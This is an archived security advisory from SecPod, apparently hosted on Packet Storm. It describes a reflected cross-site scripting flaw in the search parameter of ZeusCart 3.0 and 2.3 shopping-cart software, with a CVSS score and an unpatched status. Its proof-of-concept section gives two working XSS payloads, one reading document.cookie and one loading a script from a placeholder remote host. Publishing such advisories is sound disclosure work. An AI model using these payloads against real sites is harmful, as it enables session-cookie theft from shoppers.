exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZeusCart Ecommerce Shopping Cart Cross Site Scripting

ZeusCart Ecommerce Shopping Cart Cross Site Scripting
Posted Aug 6, 2010
Authored by Sooraj K.S | Site secpod.com

ZeusCart Ecommerce Shopping Cart Software suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 550b080fbafdca1f80da8ef422ddc21a7a427008f34736b0b7c0ab4675240c49

ZeusCart Ecommerce Shopping Cart Cross Site Scripting

Change Mirror Download
#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

SecPod Technologies (www.secpod.com)
Author Sooraj K.S
#######################################################################

SecPod ID: 1003 07/28/2010 Issue Discovered
07/30/2010 Vendor Notified
No Response from Vendor

Class: Cross-Site Scripting Severity: Medium


Overview:
---------
ZeusCart Ecommerce Shopping Cart Software is prone to cross-site scripting
vulnerability.

Technical Description:
----------------------
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.

Input passed via the 'search' parameter in a 'search' action in index.php is
not properly verified before it is returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site. This may allow the attacker to steal cookie-based
authentication credentials and to launch other attacks.

The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.


Impact:
--------
Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.


Affected Software:
------------------
ZeusCart 3.0
ZeusCart 2.3

Tested on,
ZeusCart 3.0 and 2.3 (tested using Microsoft Internet Explorer browser)


Reference:
---------
http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt


Proof of Concept:
-----------------
1)Input this code in search box and click search
'"%22%20style=x:expression(alert(document.cookie))><"
This script executed only on Microsoft Internet Explorer browser when tested
on ZeusCart 3.0 and 2.3

2) This example worked on ZeusCart version 2.3
http://www.example.com/?do=search&search='"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>

Solution:
----------
Fix not available

Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:
--------
Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close